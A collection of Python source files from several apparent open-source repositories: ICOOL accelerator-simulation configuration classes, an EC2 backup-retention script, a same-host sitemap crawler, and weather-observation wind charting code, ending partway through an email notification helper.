#### File: jon2718/ipycool_2.0/ints.py
```python
from icoolnamelist import *
class Ints(ICoolNameList):
command_params = {
'ldedx': {
'desc': 'If .true. => simulate mean ionization energy loss dE/dx (true)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lscatter': {
'desc': 'if .true. => simulate multiple scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lstrag': {
'desc': 'If .true. => simulate energy straggling',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldecay': {
'desc': 'If .true. => simulate particle decays',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldray': {
'desc': 'If .true. => simulate discrete energy loss from delta rays',
'doc': 'When LDRAY is true, the program forces the parameters DELEV=2 and STRAGLEV=5.',
'type': 'Logical',
'req': False,
'default': True},
'linteract': {
'desc': 'If .true. => simulate inelastic nuclear interactions of pions, kaons and protons',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lspace': {
'desc': 'If .true. => consider effects of space charge',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lelms': {
'desc': 'If .true. => use ELMS model2 for energy loss and scattering',
'doc': 'When this command is true an external file ELMSCOM.TXT must be provided. '
'This file consists of two lines giving (1) the ELMS run directory including path '
'and (2) the root part of the path name to the ELMS database files. For example, '
'\muon\elmsdb\rundirectory.txt\n'
'\muon\elmsdb\elmsfv3run\n'
'ELMS only works in regions containing hydrogen (the SCATLEV model is used in other '
'regions). '
'For hydrogen regions use a stepsize around 5 mm for maximum accuracy. A stepsize of '
'1 mm gives significantly worse results.',
'type': 'Logical',
'req': False,
'default': False},
'lsamcs': {
'desc': 'If .true. => use SAMCS model3 of correlated straggling and scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'delev': {
'desc': 'Model level for dEdx (2)',
'doc': '1: Bethe-Bloch\n'
'2: Bethe-Bloch with density effect\n'
'3: restricted Bethe-Bloch with density effect\n'
'4: test mode with dE = const * dz, independent of velocity and angle',
'type': 'Integer',
'req': False,
'default': 2,
'min': 1,
'max': 4},
'scatlev': {
'desc': '(I) model level for multiple scattering',
'doc': '1: Gaussian( 0, Rossi-Greisen )\n'
'2: Gaussian( 0, Highland )\n'
'3: Gaussian( 0, Lynch-Dahl )\n'
'4: Bethe version of Moliere distribution (with Rutherford limit)\n'
'5: Rutherford\n'
'6: Fano (with Rutherford limit)\n'
'7: Tollestrup (with Rutherford limit)\n'
'Level 2 contains a logarithm term in computing the Gaussian width, so\n'
'it is not useful for general monte carlo work. It gives an accurate estimate of\n'
'the width of the distribution when the step size is the same as the region size.\n'
'In models 4, 6, and 7 when the effective number of scatters is less than 20 Rutherford\n'
'scattering is used with the actual number of scatters in a given step taken from a\n'
'Poisson distribution.',
'type': 'Integer',
'req': False,
'default': 6,
'min': 1,
'max': 6},
'straglev': {
'desc': '(I) Model level for straggling ',
'doc': '1: Gaussian( Bohr )\n'
'2: Landau distribution\n'
'3: (not used)\n'
'4: Vavilov distribution (with appropriate Landau and Gaussian limits determined '
'by the program)\n'
'5: restricted energy fluctuations from continuous processes with energy below DCUTx.',
'type': 'Integer',
'req': False,
'default': 4,
'min': 1,
'max': 5},
'declev': {
'desc': '(I) model level for particle decays (1)',
'doc': '1: uniform polar decay angle for daughter particle in parent rest frame\n'
'2: 90 degree polar decay angle for daughter particle in parent rest frame\n'
'3: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays.\n'
'4: 90 degree polar decay angle for daughter particle in parent rest frame; '
'no mu->e decays\n'
'5: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays;\n'
'save accumulated fractional decay length in POL(1).',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 5},
'intlev': {
'desc': 'Model level for nuclear interactions (1)',
'doc': '1: stop tracking after an interaction\n'
'2: stop tracking after an interaction, except for protons which generate '
'a pion from the Wang distribution.',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 2},
'spacelev': {
'desc': 'Model level for space charge (3)',
'doc': '1: image charge of moving bunch in cylindrical, metallic can\n'
'2: crude transverse space charge for free space applied to all regions\n'
'3: Gaussian bunch space charge (transverse and longitudinal) for free space '
'applied to all regions\n'
'4: same as model 3 for single bunch in a bunch train. All the particles are '
'superimposed\n'
'on 1 bunch given by parameter FRFBUNSC. Adjust PARBUNSC accordingly.',
'type': 'Integer',
'req': False,
'default': 3,
'min': 1,
'max': 4},
'dcute': {
'desc': 'Kinetic energy of electrons, above which delta rays are discretely '
'simulated [GeV] ',
'doc': '',
'type': 'Float',
'req': False,
'default': 0.003},
'dcutm': {
'desc': 'Kinetic energy of muons and other heavy particles, above which delta '
'rays are discretely simulated [GeV] ',
'doc': '',
'type': 'Float',
'req': False,
'default': 0.003},
'elmscor': {
'desc': 'ELMS correlation ',
'doc': '0: run ELMS without correlations (0)\n'
'1: run ELMS with correlations',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 1},
'facfms': {
'desc': 'Factor to correct the Z(Z+1) term in the characteristic angle squared '
'χC2 in Moliere multiple scattering theory '
'times relative to reference particle at plane IZFILE.',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.0},
'facmms': {
'desc': 'Factor to correct screening angle squared χA2 in Moliere multiple ',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.0},
'fastdecay': {
'desc': 'If true => use unphysical decay constants to make {μ,π,K} decay immediately. ',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'frfbunsc': {
'desc': '(R) RF frequency used for space charge model 4. [MHz] (201.) ',
'doc': '',
'type': 'Float',
'req': False,
'default': 201},
'parbunsc': {
'desc': 'Number of muons per bunch for space charge calculation ',
'doc': '',
'type': 'Float',
'req': False,
'default': 4E12},
'pdelev4': {
'desc': 'Momentum for DELEV=4 calculation',
'doc': '',
'type': 'Float',
'req': False,
'default': 0.200},
'wanga': {
'desc': 'Wang parameter A ',
'doc': 'The Wang distribution is given by '
'd2σ/dp dΩ = A pMAX x (1-x) exp{-BxC – DpT} where x = pL / pMAX',
'type': 'Float',
'req': False,
'default': 90.1},
'wangb': {
'desc': 'Wang parameter B',
'doc': '',
'type': 'Float',
'req': False,
'default': 3.35},
'wangc': {
'desc': 'Wang parameter C',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.22},
'wangd': {
'desc': 'Wang parameter D',
'doc': '',
'type': 'Float',
'req': False,
'default': 4.66},
'wangpmx': {
'desc': 'Wang parameter pMAX (1.500) The sign of this quantity is used to select '
'π+ or π- production.',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.5},
'wangfmx': {
'desc': 'The maximum value of the Wang differential cross section',
'doc': '',
'type': 'Float',
'req': False,
'default': 13.706},
}
def __init__(self, **kwargs):
ICoolObject.check_command_params_init(self, Ints.command_params, **kwargs)
def __call__(self, **kwargs):
pass
def __setattr__(self, name, value):
self.__icool_setattr__(name, value, Ints.command_params)
def __str__(self):
return ICoolObject.__str__(self, 'INTS')
def __repr__(self):
return '[Control variables: ]'
def gen(self, file):
ICoolObject.gen(self, file)
```
#### File: jon2718/ipycool_2.0/refp.py
```python
from modeledcommandparameter import *
from pseudoregion import *
class Refp(ModeledCommandParameter, PseudoRegion):
"""
Reference particle
"""
begtag = 'REFP'
endtag = ''
models = {
'model_descriptor': {'desc': 'Phase model',
'name': 'phmodref',
'num_parms': 5,
'for001_format': {'line_splits': [5]}},
'0_crossing':
{'desc': '0-crossing phase iterative procedure',
'doc': 'Uses iterative procedure to find 0-crossing phase; tracks through all regions. Only works with ACCEL modesl 1,2 and 13.',
'icool_model_name': 2,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}}},
'const_v':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 3,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''}}},
'en_loss':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 4,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_cav':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 5,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_any':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 6,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
}
def __init__(self, **kwargs):
if ModeledCommandParameter.check_command_params_init(self, Refp.models, **kwargs) is False:
sys.exit(0)
def __call__(self, **kwargs):
pass
def __setattr__(self, name, value):
self.__modeled_command_parameter_setattr__(name, value, Refp.models)
def __str__(self):
pass
```
#### File: jon2718/ipycool_2.0/regularregioncontainer.py
```python
from regularregion import *
from container import *
class RegularRegionContainer(RegularRegion, Container):
def __init__(self, **kwargs):
pass
def gen_for001(self, file):
Region.gen_for001(self, file)
Container.gen_for001(self, file)
if hasattr(self, 'endtag'):
file.write(self.get_endtag())
file.write('\n')
```
#### File: jon2718/ipycool_2.0/sregion.py
```python
from regularregioncontainer import *
# from subregion import SubRegion
class SRegion(RegularRegionContainer):
"""
SREGION - Start of new s-region. Describes field and material properties.
Parameters:
1.1) SLEN (R) Length of this s region [m]
1.2) NRREG (I) # of radial subregions of this s region {1-4}
1.3) ZSTEP (R) step for tracking particles [m]
Note that for fixed-stepping the program may modify this value slightly to get
an integral number of steps in the region.
The following parameters are repeated for each r subregion:
2.1) IRREG (I) r-region number
2.2) RLOW (R) Inner radius of this r subregion[m]
2.3) RHIGH (R) Outer radius of this r subregion[m]
3) FTAG (A4) Tag identifying field in this r subregion
(See specific field type below)
4) FPARM (R) 15 parameters describing field (see specific field type below)
These 15 parameters must be on one input line.
5) MTAG (2A4) Tag identifying material composition in this r subregion
The wedge geometry can accept a second MTAG parameter.
The first material refers to the interior of the wedge.
The second material, if present, refers to the exterior of the wedge.
If a second MTAG parameter is not present, vacuum is assumed. (see specific material type below)
6) MGEOM (A6) Tag identifying material geometry in this r subregion.
(see specific material type below)
7) GPARM (R) 10 Parameters describing material geometry.
These 10 parameters must be on one input line (see specific material type below)
"""
allowed_enclosed_commands = ['SubRegion']
begtag = 'SREGION'
endtag = ''
num_params = 3
for001_format = {'line_splits': [3]}
command_params = {
'slen': {
'desc': 'Length of this s region [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 1},
'nrreg': {
'desc': '# of radial subregions of this s region {1-4}',
'doc': '',
'type': 'Int',
'min': 1,
'max': 4,
'req': True,
'pos': 2},
'zstep': {
'desc': 'Step for tracking particles [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 3},
#'outstep': {
# 'desc': 'Step for generating OUTPUT commands within SRegion.',
# 'doc': 'Will wrap SRegion in REPEAT/ENDREPEAT statements.',
# 'type': 'Real',
# 'req': False,
# 'pos': None}
}
def __init__(self, **kwargs):
ICoolObject.check_command_params_init(self, SRegion.command_params, **kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
self.__icool_setattr__(name, value)
def __str__(self):
ret_str = 'SRegion:\n' + 'slen=' + str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + '\n' + \
'zstep=' + str(self.zstep) + '\n' + str(Container.__str__(self))
return ret_str
def __repr__(self):
return 'SRegion:\n ' + 'slen=' + \
str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + \
'\n' + 'zstep=' + str(self.zstep)
def add_subregion(self, subregion):
pass
def add_subregions(self, subregion_list):
pass
def gen_for001(self, file):
RegularRegionContainer.gen_for001(self, file)
```
#### File: jon2718/ipycool_2.0/stage.py
```python
from drift import *
from hard_edge_transport import *
from hard_edge_sol import *
from accel import *
import sys
class Stage(HardEdgeTransport):
"""
A final cooling stage comprises:
HardEdgeTransport with transport field comprising:
(1) Drift (d1)
(2) HardEdgeSol
(3) Drift (d2)
(4) Accel (Model 1 for now)
(5) Drift (d3)
"""
num_params = 3
command_params_ext = {
'd1_len': {'desc': 'Length of drift 1',
'doc': 'Initial drift region of stage length from entrance of stage to HardEdgeSol',
'type': 'FLoat',
'req': True,
'pos': None},
'd2_len': {'desc': 'Length of drift 2',
'doc': 'Drift region between HardEdgeSol and Accel',
'type': 'FLoat',
'req': True,
'pos': None},
'd3_len': {'desc': 'Length of drift 3',
'doc': 'Drift region between Accel and exit of stage',
'type': 'FLoat',
'req': True,
'pos': None},
'transport_field': {'desc': 'Transport field strength (Tesla)',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'absorber_field': {'desc': 'Field strength (Tesla)',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'absorber_length': {'desc': 'Length of absorber region',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'rf_length': {'desc': 'Length of rf region',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'zstep': {'desc': 'Z step',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'outstep': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'rhigh': {'desc': 'R high',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'hard_edge_sol': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'HardEdgeSol',
'req': False,
'pos': None},
'drift1': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Drift',
'req': False,
'pos': None},
'drift2': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Drift',
'req': False,
'pos': None},
'drift3': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Drift',
'req': False,
'pos': None},
'freq': {'desc': 'Frequency in MHz',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'grad': {'desc': 'Gradient on-axis at center of gap [MV/m]',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'phase': {'desc': 'Phase shift [deg] {0-360}.',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'rect_cyn': {'desc': 'Phase shift [deg] {0-360}.',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'mode': {'desc': 'Phase shift [deg] {0-360}.',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None}}
def __init__(self, **kwargs):
if ICoolObject.check_command_params_init(self, Stage.command_params_ext, **kwargs) is False:
sys.exit(0)
HardEdgeTransport.__init__(self, flip=False, bs=self.transport_field)
drift1=Drift(slen=self.d1_len, zstep=self.zstep, rhigh=self.rhigh, outstep=self.outstep)
drift2=Drift(slen=self.d2_len, zstep=self.zstep, rhigh=self.rhigh, outstep=self.outstep)
drift3=Drift(slen=self.d3_len, zstep=self.zstep, rhigh=self.rhigh, outstep=self.outstep)
rf=Accel(model='ez', freq=self.freq, phase=self.phase, grad=self.grad, rect_cyn=self.rect_cyn, mode=self.mode)
hard_edge_sol=HardEdgeSol(slen=self.absorber_length, outstep=self.outstep, mtag='LH', geom='CBLOCK', zstep=self.zstep, bs=self.absorber_field, rhigh=self.rhigh)
self.add_enclosed_command(drift1)
self.add_enclosed_command(hard_edge_sol)
self.add_enclosed_command(drift2)
rf_region = SRegion(slen=self.rf_length, nrreg=1, zstep=self.zstep)
material = Material(mtag='VAC', geom='CBLOCK')
rf_subregion = SubRegion(irreg=1, rlow=0, rhigh=self.rhigh, field=rf, material=material)
rf_region.add_enclosed_command(rf_subregion)
self.add_enclosed_command(rf_region)
self.add_enclosed_command(drift3)
def __call__(self, **kwargs):
pass
def __setattr__(self, name, value):
self.__icool_setattr__(name, value)
def __str__(self):
return 'Stage'
def gen_for001(self, file):
HardEdgeTransport.gen_for001(self, file)
``` |
{
"source": "jon2allen/aws-scripts",
"score": 3
} |
#### File: jon2allen/aws-scripts/ec2_local_backup_retention.py
```python
import sys
import os
import pytz
from datetime import datetime, timezone, timedelta
import argparse
def app_run():
parser = argparse.ArgumentParser(description='EC2 local Backup retention')
parser.add_argument('--days', help='days to retain ')
parser.add_argument('--dir', help='Linux EC2 server dir')
parser.add_argument(
'--backup_prefix', help="daily backup file prefix - use \'myback\' not \'myback*\'")
parser.add_argument(
'--suffix', help="daily backup file suffix - use 'xls' not '*.xls'")
parser.add_argument('--dry_run', action="store_true",
help='dry-run for testing')
args = parser.parse_args()
# special arg processing if necessary
def check_args():
days_specifed = None
file_prefix = ""
my_dir = ""
dry_run = False
if (args.dry_run):
dry_run = True
if (args.days):
days_specifed = int(args.days)
else:
days_specifed = 10
file_prefix = args.backup_prefix
file_suffix = args.suffix
if file_prefix is None:
file_prefix = " "
if file_suffix is None:
file_suffix = "... not specified"
my_dir = args.dir
return days_specifed, file_prefix, my_dir, dry_run, file_suffix
#
days_specifed, file_prefix, my_dir, dry_run, file_suffix = check_args()
if my_dir == None:
print("No dir specified - see -h for commands")
sys.exit(4)
today = datetime.now(timezone.utc)
retention_period = today - timedelta(days=days_specifed)
# main_entry_point
process_ec2_dir(days_specifed, file_prefix, file_suffix, my_dir,
dry_run, today, retention_period)
return
def process_ec2_dir(days_specifed, file_prefix, suffix, my_dir, dry_run, today, retention_period):
def print_parms(file_prefix, suffix, my_dir, today, retention_period):
print("today's date is ", today)
print("Start of retention period (days) ", retention_period)
print("EC2 server dir: ", my_dir)
print("backup prefix: ", file_prefix)
print("backup suffix: ", suffix)
return
def delete_files(dry_run, delete_candidate_list):
for obj in delete_candidate_list:
print("Deleting: ", obj)
if (dry_run == False):
os.remove(obj)
return
def deletion_summary(delete_candidate_list):
if (len(delete_candidate_list) > 0):
print("Number of files to delete: ", len(delete_candidate_list))
print("deleting older files")
return
def get_dir(my_dir):
objects = os.listdir(my_dir)
os.chdir(my_dir)
return objects
def get_file_timestamp(utc, o):
o_time = datetime.fromtimestamp(os.stat(o).st_ctime)
o_time = utc.localize(o_time)
return o_time
def filter_dir_obj(days_specifed, file_prefix, suffix, my_dir, retention_period, filter_lists):
found_candidate_list = filter_lists[1]
delete_candidate_list = filter_lists[0]
objects = get_dir(my_dir)
utc = pytz.UTC
for o in objects:
o_time = get_file_timestamp(utc, o)
# print("file: ", o, "time: ", o_time )
if o.startswith(file_prefix) or (o.endswith(suffix)):
found_candidate_list.append(o)
if o_time < retention_period:
print("older than " , days_specifed, " ", end='')
delete_candidate_list.append(o)
print("file: ", o, "time: ", o_time)
return
def list_summary(found_candidate_list):
print("***************Summary***************")
print("Num of objects found: ", len(found_candidate_list))
return
delete_candidate_list = []
found_candidate_list = []
filter_lists = [delete_candidate_list, found_candidate_list]
# main processing loop ec2 files
print_parms(file_prefix, suffix, my_dir, today, retention_period)
filter_dir_obj(days_specifed, file_prefix, suffix, my_dir,
retention_period, filter_lists)
list_summary(found_candidate_list)
deletion_summary(delete_candidate_list)
delete_files(dry_run, delete_candidate_list)
return
if __name__ == "__main__":
app_run()
``` |
{
"source": "jon2allen/PySitemap",
"score": 3
} |
#### File: jon2allen/PySitemap/crawler.py
```python
import urllib.request
from urllib.parse import urlsplit, urlunsplit, urljoin, urlparse
import re
class Crawler:
def __init__(self, url, exclude=None, no_verbose=False):
self.url = self.normalize(url)
self.host = urlparse(self.url).netloc
self.exclude = exclude
self.no_verbose = no_verbose
self.found_links = []
self.visited_links = [self.url]
def start(self):
self.crawl(self.url)
return self.found_links
def crawl(self, url):
if not self.no_verbose:
print("Parsing " + url)
try:
response = urllib.request.urlopen(url)
except:
print('404 error')
return
page = str(response.read())
pattern = '<a [^>]*href=[\'|"](.*?)[\'"].*?>'
found_links = re.findall(pattern, page)
links = []
for link in found_links:
is_url = self.is_url(link)
if is_url:
is_internal = self.is_internal(link)
if is_internal:
self.add_url(link, links, self.exclude)
self.add_url(link, self.found_links, self.exclude)
for link in links:
if link not in self.visited_links:
link = self.normalize(link)
self.visited_links.append(link)
self.crawl(urljoin(self.url, link))
def add_url(self, link, link_list, exclude_pattern=None):
link = self.normalize(link)
if link:
not_in_list = link not in link_list
excluded = False
if exclude_pattern:
excluded = re.search(exclude_pattern, link)
if not_in_list and not excluded:
link_list.append(link)
def normalize(self, url):
scheme, netloc, path, qs, anchor = urlsplit(url)
return urlunsplit((scheme, netloc, path, qs, anchor))
def is_internal(self, url):
host = urlparse(url).netloc
return host == self.host or host == ''
def is_url(self, url):
scheme, netloc, path, qs, anchor = urlsplit(url)
if url != '' and scheme in ['http', 'https', '']:
return True
else:
return False
``` |
{
"source": "jon2allen/weather_obs",
"score": 3
} |
#### File: jon2allen/weather_obs/daily_weather_obs_chart.py
```python
import logging
import sys
import os
import argparse
import csv
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
import time
import datetime
import dateutil
import json
from obs_utils import trendline, read_weather_obs_csv, parse_date_from_station_csv
"""
This will find the last hour of the current day
if you want a specific file - specify --file
"""
logger = logging.getLogger('weather_obs_f')
def hunt_for_csv(file_id):
station_file_list = []
now = datetime.datetime.now()
day = str(now.day)
month = str(now.month)
dirlist = os.listdir()
target_csv = ''
for f in dirlist:
if(f[:10] == file_id):
if 'csv' in f:
logger.debug("station CSV file: %s", f)
station_file_list.append(f)
logger.debug("file: %s", f[:10])
logger.debug(station_file_list)
last_hour = 0
for f in station_file_list:
m1 = int(f[12:14])
if m1 == int(now.month):
logger.debug("match month")
logger.debug("Month: %s ", f[12:14])
logger.debug("day: %s ", f[16:18])
logger.debug("hour: %s ", f[20:22])
d1 = int(f[16:18])
if (d1 == int(now.day)):
logger.debug("Match day: %s", f)
target_csv = f
if d1 < int(day):
logger.debug("In the past: %s", f)
return target_csv
"""
function: parset_date_from_station_csv
input: filename ( cannoical format - example 'KDCA_Y2021_M04_D04_H00.csv')
output: datetime of file
"""
def weather_obs_subset(obs1, obs_col):
""" returns a subset of data """
try:
obs_subset = obs1.iloc[:, obs_col]
return obs_subset
except:
print("column out of range or other")
return obs1
def weather_obs_html_table(obs1, obs_col, file_f):
try:
obs_prn = obs1.iloc[:, obs_col]
out_text = obs_prn.to_html(na_rep = '<no_value_provided>')
except:
print("column out of range or other")
return False
try:
file_html = open(file_f, 'w')
except:
print("error - cannot open", file_f)
return False
file_html.write(out_text)
print(out_text)
file_html.close()
return True
def draw_obs_wind_chart(chart_date, fig_png, obs1):
""" draw chart to png file """
print ("bshape", obs1.shape)
obs1.drop(obs1.index[obs1['wind_mph'] == "<no_value_provided>"], inplace = True)
obs1 = obs1.reset_index(drop=True)
print("shape", obs1.shape)
obs1['wind_gust_mph'] = pd.to_numeric(
obs1['wind_gust_mph'], errors='coerce')
obs1['wind_mph'] = pd.to_numeric(obs1['wind_mph'], errors='coerce')
positions = []
labels = []
fig, ax = plt.subplots()
fig.set_size_inches(12, 6)
x = obs1['observation_time']
y = obs1['wind_mph']
z = obs1['wind_dir']
chart_loc = obs1['location']
print("chart_loc: ", chart_loc[0])
ax.plot_date(x, y, linestyle="solid")
plt.grid(True)
plt.title(str(chart_loc[0]) + " - " + chart_date, fontsize=15)
print("xlim: ", ax.get_xlim())
print("ylim: ", ax.get_ylim())
print("len y ", len(y))
print("len x ", len(x)," ", x.size )
print(x)
print(y)
for i in range(x.size):
if (i == (x.size - 1)):
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]),
xytext=(-15, -15), textcoords='offset pixels')
else:
if y[i] == y[i+1]:
if (len(z[i]) > 7):
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]), xytext=(15, -35), ha='center', va='center', rotation=315,
textcoords='offset pixels')
else:
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]), xytext=(-30, -15),
textcoords='offset pixels')
else:
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]), xytext=(-15, -15),
textcoords='offset pixels')
fig.autofmt_xdate()
fig.text(0.04, 0.5, 'Wind Speed - MPH', va='center',
rotation='vertical', fontsize=18)
fig.text(0.5, 0.05, 'Hour of day', va='center', fontsize=18)
if (len(y) > 2 ):
date_ser = mdates.date2num(x)
tr = trendline(date_ser, y)
fig.text(0.1, 0.05, 'Polyfit: {:8.4f}'.format(tr), va='center', fontsize=16)
# plt.xticks(positions,labels)
date_form = DateFormatter("%I")
ax.xaxis.set_major_formatter(date_form)
print(x)
print(y)
print(z)
print(x.size)
print(y.size)
fig.savefig(fig_png, dpi=fig.dpi)
return True
def obs_meta_date_json(station, obs1):
date_ser = mdates.date2num(json_out['observation_time'])
y = json_out['wind_mph']
obs_data = {}
obs_data['station'] = station
obs_data['polyfit'] = 0
if len(y) > 1:
obs_data['polyfit'] = trendline(date_ser, y)
obs_data['max'] = obs1['wind_mph'].max()
obs_data['min'] = obs1['wind_mph'].min()
json_out2 = json.dumps(obs_data)
return json_out2
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='weather obs - daily chart')
parser.add_argument('--file', help='name of input file - csv ')
parser.add_argument('--chart', help='output png file')
parser.add_argument(
'--station', help='station - either linke or 4 char name')
parser.add_argument('--table', help='output html table file')
parser.add_argument("--tablecols", help='list of cols by position')
parser.add_argument("--listcols", action="store_true",
help='helper func - list columns by position')
parser.add_argument(
'--dir', help='director - otherwise /var/www/html/weather_obs')
args = parser.parse_args()
# station is 4 character NOAA observation station in CAPS
# csv dir is where the data resides
# where the graph png shoud be placed.
os.environ['TZ'] = 'US/Eastern'
if (args.dir):
print("args.dir: ", args.dir)
try:
os.chdir(args.dir)
except:
try:
print("trying /var/www/html/weather_obs")
os.chdir('/var/www/html/weather_obs')
except:
print("using start directory")
else:
# todo - doesn't work on windows
try:
os.chdir('/var/www/html/weather_obs')
except:
pass
station = ""
csv_dir = ""
graph_out_dir = ""
now = datetime.datetime.now()
day = str(now.day)
month = str(now.month)
print("month: ", month)
print("day: ", day)
chart_date = now.strftime("%b %d, %Y")
print("chart_date: ", chart_date)
if (args.file):
dt = parse_date_from_station_csv(args.file)
chart_date = dt.strftime("%b %d, %Y")
print(" new chart_date: ", chart_date)
"""
code logic
1. find all files with current month.
2. open and see if equal to date, if not move on to next csv for month until no more
3. process data for chart
- temp wind and guust
"""
if (args.station):
station = args.station
print("station: ", station)
else:
station = "KDCA"
dirlist = os.listdir()
station_file_list = []
target_csv = ""
file_id = station + "_Y" + str(now.year)
fig_png = station + '_current' + '.png'
if (args.chart):
fig_png = str(args.chart)
print("file_id:", file_id)
target_csv = hunt_for_csv(file_id)
print("target_csv: ", target_csv)
if (args.file):
target_csv = str(args.file)
print("file input: ", target_csv)
station = target_csv[0:4]
print("station:", station)
obs1 = read_weather_obs_csv(target_csv)
if obs1.empty:
print("fata error - cannot read file")
if sys.platform.startswith("linux"):
from email_obs_err import *
send_error_email("daily chart")
exit(16)
if(args.listcols):
x = 0
for cols in obs1.columns:
print("column: ", x, " -- ", cols)
x = x+1
sys.exit(0)
# default tablecols for wind
# df[['observation_time','wind_mph','wind_dir','wind_gust_mph','wind_string']]
table_col_list = [9, 19, 17, 21, 16]
if (args.tablecols):
try:
table_col_list = list(map(int, args.tablecols.split(',')))
except:
print("html table list not column intergers")
if (args.table):
weather_obs_html_table(obs1, table_col_list, args.table)
# default
else:
weather_obs_html_table(obs1, table_col_list, 'wind_chart.html')
# print(obs1.shape)
# print(obs1.columns)
print ("bshape", obs1.shape)
obs1.drop(obs1.index[obs1['wind_mph'] == "<no_value_provided>"], inplace = True)
obs1.dropna(how = 'all', subset = ['wind_mph'], inplace = True)
obs1 = obs1.reset_index(drop=True)
print("shape", obs1.shape)
obs1['wind_gust_mph'] = pd.to_numeric(
obs1['wind_gust_mph'], errors='coerce')
obs1['wind_mph'] = pd.to_numeric(obs1['wind_mph'], errors='coerce')
obs2 = obs1.copy(deep=True)
draw_obs_wind_chart(chart_date, fig_png, obs2)
# print(ax.axis())
# date series.
json_out = weather_obs_subset(obs1, table_col_list)
result = json_out.to_json(orient="split", date_format="iso")
parsed = json.loads(result)
print(json.dumps(parsed, indent=4))
date_ser = mdates.date2num(json_out['observation_time'])
y = json_out['wind_mph']
print("len date_ser: ", str(len(date_ser)))
print("len wind_mph(y): ", str(len(y)))
print(date_ser)
print(y)
if (len(y) > 1 ):
print("polyfit: ", str(trendline(date_ser, y)))
print("Max wind speed: ", str(json_out['wind_mph'].max()))
print("Min wind speed: ", str(json_out['wind_mph'].min()))
json_out2 = obs_meta_date_json(station, obs1)
print(json_out2)
```
#### File: jon2allen/weather_obs/email_obs_err.py
```python
import subprocess
from email.message import EmailMessage
def send_email(from_addr, to_addrs, msg_subject, msg_body):
msg = EmailMessage()
msg.set_content(msg_body)
print("from_addr: ", len(from_addr))
print("to_addr: ", len(to_addrs))
msg['From'] = from_addr
msg['To'] = to_addrs
msg['Subject'] = msg_subject
